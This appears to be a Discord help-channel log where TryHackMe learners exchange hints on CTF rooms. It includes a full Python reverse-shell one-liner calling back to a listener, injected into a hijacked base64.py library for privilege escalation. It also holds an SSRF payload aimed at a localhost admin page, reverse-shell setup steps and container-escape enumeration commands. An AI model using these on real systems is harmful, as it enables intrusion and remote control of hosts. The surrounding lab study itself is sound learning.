OK, I know why it doesn't work.
The wordlist doesn't contain the right color,
as far as I see.
It has 81 colors that contain the correct color, with all sorts of quirky qualifiers, but never the actual, plain color every child knows
I was hoping exactly that wouldn't happen lol, I'll try
Unless I missed it, which is possible.
I mean, sacramento_state_green, ufo_green, screaming_green, who comes up with that stuff...
green_color_wheel_x11_green oO
oh really... I tried red, green, blue the first time, but I guess when it reloaded the page, I didn't reselect the color question
Silly me, thanks @ruby creek
Gave 1 Rep to cyberterms (current: #254 - 20)
about wfuzz/Burp not working, I bet it's because I didn't copy the PHPSESSID cookie after entering joseph
Learned something today then
What service is running on port 80 and how do you typically interact with that service?
It might be too early for you to attempt this if you have this question, no offense.
I don't mean 80.. ofcz.. it's http.. ohh man I forgot to make a box inside it.. wait
ahh now it's ok
I am doing
this room
and I saw the source code and the /assest directory and also robots.txt and got some things.. but I don't know what to do next, so I was trying to make an ssh connection
and I am not able to connect via ssh as it says something like public key
please delete my comment if I revealed anything related to ctf
Oh ohk.. thanks for the hint.. this also helps me a lot
Gave +1 Rep to @lucid junco (current: #1 - 2313)
The ssh host keys you highlighted in your screenshot are irrelevant in 99.99% of cases. You're unlikely to ever do anything with them.
And I have not that much knowledge yet to do anything with them. Can you teach me?
They are there to identify the server to you. So that you know you're connecting to the right server and not that of an attacker. When you connect to a server for the first time, your local machine writes the server's "fingerprint" in the "known_hosts" file. If you connect to the server again it checks that file and warns you if the fingerprint changed. That could indicate a man-in-the-middle attack.
In terms of "doing anything with them": Not really.
Wow, thank you so much.. I didn't know that..
Gave +1 Rep to @ruby creek (current: #230 - 23)
Hi, I'm doing static malware analysis for the malbuster room.
I'm trying to view one specific header value - am I looking at the wrong place? I have tried checking the data type manager as well to match with any other field, but I'm kinda lost.
Alright, got it! It was in the address being changed by the malware.
https://tryhackme.com/r/room/owasptop102021
Task 22 - SSRF
I was hoping the server's GET request to my box, when responded to with a redirect, would show the admin site, but it instead just returned an empty PDF... :/ Any tips on what to look for?
the request I tried:
GET /download?server=http://attacker-box:9001&id=75482342
then I'd paste this redirect to the running nc:
HTTP/1.1 301 Moved Permanently
Server: nginx
Connection: close
Content-Length: 0
Location: http://127.0.0.1/admin
which returns the empty PDF
just an idea: Have you tried URL encoding the part after GET?
I don't think that's necessary because the GET request was processed just fine
[this](#878393611929129000 message) says the PDF file should be enough, because it's supposed to access an internal resource which it presumably does, but I'm not so sure
oh so I found the answer [here](#room-help message) ... ||http://10.10.207.210:8087/download?server=localhost:8087/admin%23&id=75482342 - the important thing is %23 - #|| but I don't get why...
So I wasn't that far off
oh I know why! ||the hash sign is used as a HTML fragment, so when the URL is filled by this code: crl.setopt(crl.URL, server + '/public-docs-k057230990384293/' + filename) it becomes localhost:8087/admin#/public-docs-k... which accesses the /admin endpoint||
I wasn't aware of the HTML feature I mentioned above, that's like completely random given the task
@magic coral in case you still wonder about the reason
You'll probably never forget after this, I'd count that as a success
there is a flag to find https://tryhackme.com/r/room/redteamfundamentals
Task 6?
You need to follow along with the static site.
You keep clicking, at the end the flag is at the bottom of the page.
Great
Found it?
Thank you
The last 2 questions for ToolsRus
I'm stuck on the last 2 questions trying to figure out how to exploit the box to gain shell access. Any hints in the right direction to focus on would be awesome!
https://tryhackme.com/r/room/toolsrus
NM, looks like I just figured it out. Seems I needed to step away for a day, haha.
I'm working on Road (https://tryhackme.com/r/room/road) and was wondering if anyone could give a nudge? I've been tinkering with ||/usr/bin/sky_backup_utility|| and still haven't figured out how to escalate privileges into || webdeveloper ||.
Enumerated any databases?
Yes, I got the application credentials for the ||admin@sky.thm|| user
What about ||mongodb|| ?
Tried the password, but it didn't work. I also saw one password purporting to be a secure one, but didn't work as well.
Oh.. this one I have yet to try.. Let me take a look. Thanks.
Gave +1 Rep to @lucid junco (current: #1 - 2347)
Appreciate the assistance @lucid junco! Not sure why it didn't occur to me to check that one although it was probably because it was my first time encountering it in a ctf.
Gave 1 Rep to .scrubz. (current: #1 - 2348)
Anyone good at command line searching of event logs? I need a hand to get to the answers for the Windows Event Logs room.
This stuff has way toooooo many options.
So the question goes like this:
'A Log clear event was recorded. What is the 'Event Record ID'?'
Can't seem to find my way in searching for it correctly.
This is concerning the room Windows Event Logs.
I haven't done the room yet, but as I understand Windows event logs, certain activities have event IDs, like 4625 corresponding to login failures. Have you tried to do a Google search for it?
Eventually I googled some event IDs and found what I needed, but I was under the impression you had to find out via the command line with Get-WinEvent.
So I kept being stuck for a long time, but then decided to move on and googled for the IDs, which gave me enough to progress further.
I need some too.
Seems I am in a rabbit hole ^^ or I'm missing something
I can give you a bit of a hint, but I'm kinda at the beginning
I'm already into this
Have you got any further?
I'm OK with the first vuln.
I got two usernames. In that case, could you give me a hint?
I have some information and got some files. I could do a thing if I had access to a particular function, if you understand what I mean.
have those too
I don't think we need to bruteforce it :/
Sent you a dm
Not in the first 72 hours after release of the room.
Ok thanks
Gave +1 Rep to @ruby creek (current: #85 - 76)
Please ask before you DM users.
Sorry
Hey, I'm having a problem with this question in the room Red Team Engagements on task 3:
What is the first access type mentioned in the document?
Are you using the document on the static site?
Yes unable to download attachment
Is your browser blocking it?
Correct, called it a 'dangerous download'
It's ok, it's a false positive.
Got it! Thanks
I need a little nudge in the right direction or a hint. I am doing "Chill Hack". I have a shell and have done "sudo -l", but I am not sure what to do with that information. It says nopassword, but that file is already world readable. Sorry I am not giving too many specifics, I don't know how much info is OK to post and I don't want to ruin it for someone else.
You're on the right track with your findings.
Continue by investigating the code in that file. Could it be vulnerable?
Thank you! I have one question about that: vulnerable as in changing the code or using it as is? I ask because if it is using it as is, then I know I need to do some learning to better understand what is there and how it actually works vs how I think it works.
Gave +1 Rep to @ruby creek (current: #64 - 109)
As is.
Thanks! I will sit down with it tonight and see what I can learn.
Gave +1 Rep to @ruby creek (current: #63 - 112)
Did you figure it out?
Yah, I got there eventually. Learned a lot. Sadly the privesc kicked my butt.
That was a fun one, I had the most trouble in the initial access or filtering aspect of it.
I had to go through a write-up and still had some trouble fully understanding it.
I'm now on Gotta Catch'em All! currently working on privesc. It's an area I need to work at.
Oohh.. that one.. I'm stuck at the initial access or foothold part.
Haven't had the chance to go back as I recently moved jobs and am catching up on a bunch of stuff.
it's fun I am enjoying it. I have been doing a little here and there as I have time
Is there a way to just pick up where you left off for the last clocky answer? really don't want to start all the way over.
If you terminate a machine no, the progress will reset.
@lucid junco Gotcha, the last part is kicking me hard lol.
I am looking for a hint to point me in the right direction in "Gallery". I am stuck trying to find the admin password hash, though I already have the next flag and am on the box with a reverse shell and have switched users already. I just can't seem to figure out where to find the hash. Any advice would be greatly appreciated.
Have you tried exploring the || database ||?
Yes and no. I am aware that there is one, just haven't figured out exactly how to view it. I assume through SQL injection and will have to do more research on the topic and how to get it to do what I want.
Also, how did you black that out until I click on it? That seems like a good thing to learn. I am scared of saying too much when I ask for help. I don't want to ruin things for other people.
If you surround text between double pipes "||" it becomes a spoiler.
||like this||
Disclaimer: I can't remember doing the room myself. ||But SQLi when you already got a shell is less likely than that there's maybe a database server listening to connections from localhost running on the machine.||
Running || linpeas || or || lse || should lead you to the next steps.
Thanks I think that will help
Gave +1 Rep to @tropic garden (current: #11 - 583)
Hey anyone up
Just shoot in your question and someone will surely get back to you provided it is within THM discord rules.
How to abuse /usr/bin/** to get root in mkingdom
Oh.. this one might be better posted in #1251235113803714590
K
Source Code Security Task 8 Secret management. I struggle to find the hidden flag, even though I think it stares you in the eye as you know it... but where?
Been at /r/room/relevant for an hour and haven't been able to find anything other than it's a Windows machine with IIS, SMB/NetBIOS and RDP
No dirs found on web, no smb or rdp exploits
So far found SMBDomain RELEVANT and probably Windows Server 2016
Will check UDP next, but almost out of ideas
no smb or rdp exploits
Are you sure?
I did check the more recent ones, I didn't check the 2012 and earlier ones. I'll check again in a bit. Taking a break for lunch
Got it
I also read the hint in the source code, but I can't figure out which "console" it's about.
The room is "pokemon".
Who knows where this console is hidden?
||If we are talking about the console in the browser's "developer tools", then there are just Pokemon names, there is nothing else interesting.||
The console is the browser.
Are you sure?
Or is it a rabbithole? ;p
There is a code there, but I haven't figured out how it helps to get a foothold on the machine yet.
If I'm only going in the right direction. Maybe I have the wrong vector of thought on how to exploit this.
Have you checked the source code of the website?
^
Yes, there was a hint about the console.
Can you take a screenshot of that area?
I'll try to think about it.
Not yet, I want to figure it out for myself (if it's obvious))
I'm stuck in that same step.
I've looked at the console and played around with the code, though I've yet to make sense of it.
Maybe I'll give it one last attempt when I get the chance and let you know. I'm still playing catchup with work and a bunch of training hours I need to complete this weekend.
I took a fresh look at the source code.
I had an epiphany.
@lucid junco Thanks, I was blind
I can't for the life of me seem to access this folder from PowerShell.
I own it. I can write to it, list it, move it, try it somewhere else.
But no matter what, I can't read any file from PowerShell.
I've tried using the example commands byte for byte... and still the error persists.
Figured it out.
Apparently just don't specify any path at all,
and suddenly it can access it.
Ahoi! I want to solve the optional SSRF in Task 22 for owasptop102021. Though I'm not sure in which direction to head or if I'm on the wrong track. I'm wondering if I should take a closer look at how to get the Werkzeug PIN when forcing a stacktrace. Please give me a nudge
You will have to use the existing SSRF vulnerability that you used before. Focus on the fact that the admin page can only be accessed from localhost.
Thanks @lapis pond, I'm really at a loss here. I don't know how the admin page actually checks for localhost. I know from the previous task how to direct traffic to a different server, but don't see how that helps. I now tried to use the machine as its own target, but this also just generates the PDF downloads with either the resume or a 404 if I try different ids or append /admin to the server param. I don't see how to manipulate the id param as it needs to be an int or the page throws an exception, and I don't think I should follow the Werkzeug path.
I know that the request for /download would end up in /admin/public-docs-k057230990384293/ but still... I'm just stuck or blind or
Gave +1 Rep to @lapis pond (current: #106 - 62)
It's not an easy one per se, that's why it's a bonus question and you don't need it to finish the room. You could either come back to it later when you have more knowledge, or if you want more than a hint/nudge we could take it to #room-help.
Would love that. I'll take a few more minutes. Currently reading up on different formats to use in an SSRF and want to see what I can gather. I'll ping back!
I really can't make any sense of it.
Sometimes you can find credentials separated by a colon....
||<username>:<password> without the <> ||
Check the source code again.
Oh come on!!! I was too focused on the || console ||.
You probably glossed over it too many times.
Yeah... saw it multiple times, but was misdirected
Now you'll speed through it. That's the hardest part
I'll let you know how it turns out. Had to stop doing THM stuff to catch up on work.
How can I log in with a non-ASCII character in the password...
I can't type it, I can't pass it in the shell or as a variable.
It contains a hex(200) and a ( which seems to be enough to break any quote system I can find
Has anyone actually ever used this or seen this in production? I can't imagine anyone would set a password to something that could never be typed.
Managed to get in, but not by using that password, that's ridiculous.
In which room did you encounter this?
/r/corp I believe
Oh.. haven't done that one yet.
around the 1hr mark
Tell me what I'm doing wrong.
room - magician
There are a bunch of examples of how to create a payload in the form of a downloadable file.
I do various checks on the POC, but none of them work.
Is there a need for a different approach to the exploit or something else?
Are you trying to get access?
^
Yes, RCE.
Maybe my code itself is not correct.
I have to upload the file and wait for the service to process it.
The malicious code is triggered and I get what was in the code.
I don't have to open the file from the site myself?
Apparently, I'm doing something wrong.
Or I need to edit these files in some other way.
Not a single file wants to work.
I'm adding magic bytes and no bytes.
I downloaded ready-made exploits.
They don't work either.
Whoever has passed this box, write to me in a DM how you solved it.
I don't want to read a ready-made step-by-step walkthrough of an "easy" box, where they will give a ready-made solution; I want to understand how it works on my own.
Re: Dead End, is it old enough now to ask what the service or application is that indexed the vulnerability we are looking for? And NOT the key itself. I've spent a really long time looking at the registry keys on the VM and still haven't found what I'm looking for.
Original question: What is the full registry path where the existence of the binary above is confirmed?
@chrome helm How are you editing/entering the data for the poc exploits?
Like vi on the AttackBox?
open page with poc, then file save-as in browser?
I experimented with the provided "Simple reverse shell" that is on github and I managed to catch the shell!
Thanks)
Gave +1 Rep to @fleet pike (current: #641 - 6)
But now I'm trying to get root and I haven't figured out which direction to go in yet. (room - magician)
Linpeas?
Yeah, I did.
I'll try to check the output again more carefully.
(the only thing that got me hooked there was this)
What's running on port 6666?
But pivoting didn't give me access to the site. And there is little information locally through curl.)
I will try to think in this direction if I have chosen the right vector)
Have you ever used chisel ?
yeah
Good, that's your hint.
I've yet to get the fire pokemon flag, but not ready to give up yet.
I'm not sure if I'm missing something obvious again.
It's hidden in there, you'll find it.
Yeah, I'm scouring the lse and linpeas output line by line.
Hello
In the Network Services Room under Task 4 (Exploiting SMB), the question is: Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?
Can anyone give a hint what to look for? I have found the ssh private and public keys from the .ssh folder
You found a text file that was signed with a name. This is your clue for the username.
is it cactus?
Or is it cactus@polosmb?
You could try both, but an extra @ in a username for ssh seems like it could cause problems.
it's cactus
||Spoiler!!! This is hints, not help.||
Got it, thank you
Gave +1 Rep to @lapis pond (current: #92 - 71)
I was stuck because I forgot to move and place the id_rsa file into the .ssh folder and then initiate the ssh connection
After moving it into the folder it worked
ON OSIRIS:
SPOILER ALERT!
I've substituted the old masterkey with the new one, then when I go and use it to decrypt the blobs around:
||C:\windows\temp\CQDPAPIBlobDecrypter.exe --master=9F9C0C578D5546FD08834375F1443E5B55400BF93EEA53CCE3BECA8690BBEFCD547B4EAA8E9B092D3D5C8D37842EFB46D874AB9A2EA852B0966EBA9AA8B20298 --entropy=DE135B5F18A34670B2572429698898E6 --blobfile=C:\Users\chajoh\AppData\Roaming\Microsoft\Protect\S-1-5-21-555431066-3599073733-176599750-1125\BK-WINDCORP --outfile=C:\windows\temp\BK-WINDCORP.txt --golden=C:\windows\temp\DKM.pfx||
There's something wrong with provided masterkey, try again!
Can somebody give me a hint about it? Please?? These CQDPAPI* tools are driving me crazy xD
Why this output:
There's something wrong with provided masterkey, try again!
it doesn't seem to me that there is something wrong with it...
Hi, I'm doing the Pickle Rick room and I tried running gobuster to find hidden directories, but all the requests are canceled. Could anyone explain why it is happening and if I can fix it?
Looks like it can't get a connection
I don't understand why though, I was able to run dirb without trouble.
.
@white salmon Yes, said script is related to the path to root... but as you probably have noticed, you cannot edit it.... Check for things that run multiple times on the target machine.
Alright, thanks!
Gave +1 Rep to @alpine kestrel (current: #4 - 1817)
no problem
Verify the target URL.
Check if the wordlist file exists at the specified path
???
No matter how hard I try I can never finish a CTF without reading a writeup..
I almost feel like it's too hard for me.
I read the script and thought of rewriting the base64 binary. So I ran which base64 and found it, but I had no permissions to edit it.
So I gave up and checked a writeup, and the solution was editing base64.py.
Idk how I was supposed to know that base64.py is used instead of the base64 in /usr/bin/base64.
I just don't get the same ideas as you guys.
Because the script is a Python script, so it uses a Python library.
Still, you are making progress.
Yeah, but my brain thought if which base64 returned some binary, that's the one it's using.
It's just hard..
I hope so
You already understand more than most of the rest of the world when it comes to problem solving, it's hard. Sometimes seemingly impossible. But as researchers / hackers / security people, that's the game.
constant learning, adapting, overcoming.
More often than not, failing, and trying again.
Finally take lots of good notes...
Thanks bro
Gave +1 Rep to @tranquil sparrow (current: #641 - 6)
Hi, I need a hint with one of the problems in the regular expressions room. "Match all of the following filenames: ab0001, bb0000, abc1000, cba0110, c0000 (don't use a metacharacter)". So my initial thought process was to start with ||[abc]||, but I am not sure where to go from there. I have looked through the previous tasks but I'm still stumped on this.
I really like using https://regex101.com when messing around with regex. You can input the sample data in the bottom text field and then build/change your query in the top, and see the effects live
Rather embarrassingly I went to check out the room, only to find that I did not finish it... Guess I know what I'm doing with my next block of time.
So I have arrived at this answer: ||[abc]{0,1}[0-1]{4}|| using the website (thank you btw!!), but it's unfortunately incorrect.
Ok nevermind, I got it
Hi!
Are there any Java specialists among you?
I'm doing the "glitch" room; I have already fuzzed everything possible with different wordlists.
I looked through Burp and through the developer panel. Which way should I dig in search of an "access token"?
The only thing that caught my attention was the directory ||"/secret/"||
I also checked the image from the site with these tools:
steghide, exiftool, strings, binwalk
But everything is clean there.
Java or Javascript? probably javascript. aww. got my hopes up lol. I'm no JS expert unfortunately
Has anyone solved the Include challenge (from the advanced server-side attack path)?
I am doing the OWASP Top 10 room. Task 7 states to open MACHINE_IP:8088 for the lab. However, when I enter the IP followed by ":8088", I do not get any response. Can anyone help with what the issue might be?
Are you connected to THM OpenVPN when you tried to access it?
Sorry, is this really an "easy" room?
Without knowledge of Java, is it really possible to go through it yourself? Not using step-by-step walkthroughs, only Google.
I am using the AttackBox and am able to access other labs on the same target machine, e.g. ip_address:84, but can't access ip_address:8088.
The instructions say that I need to open port 8088.
Do you have the correct target deployed then? If I'm not mistaken, there should be different targets for that room.
Yes it is correct target as this target is supposed to be used for all the exercises of OWASP Top 10 Room
Can you provide the link to the room as there are a couple of OWASP Top 10 rooms?
https://tryhackme.com/r/room/owasptop102021
I am on Task 17
Can you verify your account and share a screenshot of what appears on your browser?
@sudden schooner
This is the task. As I am not subscribed yet, I am unable to start the AttackBox at the moment. Basically the issue I am facing is that when I open x.x.x.x:8088 in Firefox within the AttackBox, it keeps loading forever. I can share that screenshot tomorrow.
Use openvpn bro
Use your own kali machine
That looks like you haven't started the machine
Machine-ip gets replaced.
I have a parrotSec on external ssd and currently working on windows so gonna try it in a little while.
I had it started but turned it off as I was unable to start the AttackBox. I'll try again and share the result here.
I was able to access it after connecting using OpenVPN. There must be some issue with the AttackBox.
Working on Opacity after being away for a long while. I didn't have any luck distinguishing a valid username from the initial login page, so I began enumerating directories.
I came across the image upload page at ||/cloud||, as well as the ||storage.php|| page a successful upload redirects to. I'm unable to preview any valid images I uploaded on that page. Trying to view them directly at ||/cloud/images/Foo.jpg|| results in a 'Not Found' page that says: The requested URL was not found on this server.
I was able to sneak a .php.jpg file through, though I'm not sure how I'm going to interact with it yet. I've done a bit of poking on the login page, but haven't gotten anywhere with basic sql injection, user enumeration, or anything really.
I don't want hints so much, but rather reassurance I'm not poking around a dead end. Is the web page bait?
Edit: WOO!
Is the edit a successful shell?
I was able to get a revshell running.
Had to call it a night before I got anywhere else, but I'll make progress after work tonight.
Anyone have a hint on how to get the credentials for the Skynet administrator room?
The hidden directory one, or whether I need to somehow bypass it. It doesn't seem the password is in rockyou.txt or log1.txt, unlike the SquirrelMail password.
Default credentials also do not work.
For the root flag, you need to privesc, you won't be given the password
so the user flag is not in the hidden directory admin room?
You need a shell for it. It's in a different directory.
okay i see, thank you!
Btw, these books in the milesdyson share folder from the Skynet room sound interesting. However, I suspect it's illegal if we downloaded them to read for ourselves, right?
I'm not certain if it will be put in there if there would be copyright issues as THM Staff would surely point that out before releasing the room as part of the QA process.
Okay, so I'll gladly take that as a no, and as an excuse in case the FBI wants to have a chat with me.
thanks!
Hey mate, what did you end up getting for this one? Having a bit of an issue with this one atm 😵‍💫
Hi! So I ended up getting ||[abc]{1,3}[01]{4}||, which was really close to my previous answer ||[abc]{0,1}[0-1]{4}||
I ended up getting it but thank you!
stuck where?
Hello, I am stuck on getting the third password in the Nano Cherry room.
I've tried connecting to bob-boba by using http.server and netcat but still no luck.
It either can't read the file or it won't connect through netcat.
Is there another way?
@raw wadi If I recall correctly ||there is no password for bob-boba, you need to abuse a service/script to get a reverse shell. This is achieved through the initial credentials you are given.||
@tranquil sparrow Ahh yes this is what I meant
But I'm still struggling for some reason. I would do:
|| 1. The reverse shell of bash -i from revshell.com using port 123, in the correct file of course.
2. Then put cherryontop.tld with the IP into the hosts file under the notsus user.
3. Under no user, run python3 -m http.server 8000.
4. Under no user, in a separate terminal run nc -lvnp 123 ||
But http.server would not output anything unless I manually go to the file in a browser, and trust me, I waited a while too.
And if I manually do it, the nc -lvnp part won't connect to anything.
I'm going to try again today but I've been stuck here for a while.
http.server isn't going to do much for you in this instance, except allow you to serve files from the current user.
We're trying to get a shell as another user, so we need to find some sort of service/script that's running as that user which we can abuse to connect back to our machine.
So ||enumerate crontab; maybe there is something there that we can host locally and call out to?||
Ok, I'll give it another shot in a bit and I'll get back to you. Thx for the advice.
np.
https://tryhackme.com/r/room/winincidentsurface, please help me solve task 10
Have you checked if that was discussed in #1255538340544122951 ?
The author has somewhat overdone it with the machine and the CTF.
How do I find the last flag if I'm already on the machine as root?
Room - Cat Pictures
@chrome helm Are you certain you are root on the machine? Or are you in a virtual environment/container?
find / -iname "*.txt" 2>/dev/null
By the way, that's what I was thinking.
I feel like I'm in a container after all.
No, I didn't find anything with this search. Still, I haven't got out of the container.
Which room?
Room - Cat Pictures
It is strange that manual enumeration did not give me any hints about the container.
for user in $(cat /etc/passwd | awk -F: '{print $1}');do echo "$user" ; id "$user" ;done | grep -B 1 "docker"
find / -name docker.sock 2>/dev/null
ls -l /run/docker.sock
ps -ef | grep -i "docker"
docker images
How else can you tell that I'm in a container?
Edited out, it's not fair to make that statement, nor is it accurate ("Hostname is sometimes a good indicator").
I will say that if no hostname is set there is typically a random hash for the hostname, and container environments typically only run the services that they need, so the ps aux list would be shorter than normal.
Yes, the hostname is strange.
Port 2375.
And there is also a hint on how to get out of the container: ||(I realized that it is not privileged and I have little access). How should I use this port, via "pivoting" from the attacking machine, or somehow from the inside?||
Can anyone give me a little hint on the Overpass 2 - Hacked room? Just need the root flag.
nvm, got it
Or no, I haven't. Tried using the RSA key but that didn't work to get root, only to get into the james account.
Doing the Valley CTF room. Can anyone give me a hint to gain root access? I think I did more than enough enumeration.
Are ||kernel exploits|| the way to go?
You're looking for an interesting script.
I saw that... but I think it's behind a firewall or something. I tried manipulating it... it's not responding with that ||cronjob|| in place.
Which script?
||/photos/script/photosEncrypt.py|| this right?
Yeah
Have you checked what the script does?
Yes.. but none of those ||directories|| are ||writable||.
Are you sure?
Oh wait.
I think I need one more hint on this. Anybody?
Thanks, I figured it out!
This port is not involved in any way in getting out of the container.
If I'm not wrong, it doesn't look like the ||script|| is executing the ||*.enc|| file. It only saves to the output directory. Then how am I able to leverage this for privesc?
It might not, but the script certainly does something. Have a look at what it imports.
Yes, it imports ||base64|| and... I don't know how I can execute the encoded script, since it's owned by root and I cannot give it execute permission.
Look for the binary.
Where? It isn't specified in that script, I believe. Edit: Oh, you mean ||valleyAuthenticator||?
No, the ||photoencrypt|| script imports base64, so you'd need to find the library. ||/usr/lib/python3.8/||
But how does that help to execute what's in it? It's only for encoding/decoding.
Have you ever encoded a reverse shell?
but for executing it we need execute permission right?
No
Have a search for the base64 library vulnerability
This involves a bit of Python coding, I guess. Thanks a lot for helping anyway.
No I mean adding import and execution functions in the ||base64.py||
Thanks for all the hints. It's done. In the end... I used AI to make the ||python script||. I shouldn't have done it. Ik it's not allowed in exams... but I'm not good at Python. Still, I tried to make that
||script|| myself but it failed every time. I know what I did was wrong... still I think what I did is better than giving up. Yh, I don't deserve it.
Apart from that, this was a hell of a CTF. Took me almost a day for just the privesc. Python chads can surely nail it in no time.
You wrote a full script?
Um, yes. To ||decode|| and ||execute|| the ||encoded|| ||reverse shell||.
I just added this
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.5.163",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
To the file that's already there.
The encryptphoto script runs, imports the library, and that command gives us the rev shell.
Looks like the file isn't there.
You need to download the SecLists files.
They gave you the command for AttackBox usage.
The command assumes you're on the AttackBox.
This will differ on your own machine.
Hello everyone,
just wanted to tell you that the https://tryhackme.com/r/room/threatinteltools scenario 1 task is outdated,
so the Threat Intelligence Tools room, scenario 1.
The only way to solve this is by looking at a writeup. I checked the hashes and it's the same hash; however, Talos doesn't list the required detection alias anymore.
The answer can be obtained by using the other resources listed.
Which one? Tried MalwareBazaar and ThreatFox, however none of them list the SHA hash.
So I looked around the chat a little, and it would be great if you could include VirusTotal as a short alternative in that room as well; the task has become too misleading.
It doesn't need to be much of a rework, but just two or three sentences as a reminder that that page can be used as an alternative to Talos would be great.
To any of those ||*.jpg|| file?
No, to the base64 binary
I checked that.. guess the ||reverse shell|| I used was wrong. You didn't encode this with base64, right?
I think I added it in the ||base64.py using a python payload, iirc.||
The photo script does that; it imports from the library.
Ooo... right! That import is there for a reason... Got it! What I did was ||pull, decode and run|| the ||encoded reverse shell|| from one of the ||p*.jpg|| files by using ||base64.py||... long path, but hey, it works lol.
Hello
The hint is: "Make sure your new balance is a positive number. If your balance still shows a negative value (even after refreshing the page), you may need to transfer more money."
Halo
Hello.
Are you trying to get the flag?
Are $_requests a global variable? I'm not entirely sure I understand it.
https://tryhackme.com/r/room/deadend
Hi all,
I am stuck on the last question. I got a base64 string and decoded it, but the answer is not correct. Are there any hints?
Hey, has anyone solved Friday Overtime? (I'm done; need to examine the questions and expand the search options.)
I need help in a room called Jack. Is anyone familiar with it?
It's been a little bit since I did it, what do you need?
Just a small hint. I am stuck on it for 3-4 days with no progress. I am looking at WordPress 5.3.2 vulnerabilities (https://wpscan.com/wordpress/532/) and can't figure out what to use, so any small hint will be appreciated.
Have you managed to enumerate users?
Yes, all of them.
Have you created a userlist to bruteforce their logins?
I've tried to bruteforce with no success.
Which word list?
rockyou.txt
Let me open it up and see.
You should use the full rockyou list.
It should be zipped inside that folder.
May be a tar file, I can't recall.
Thnx for the hint, I will try it.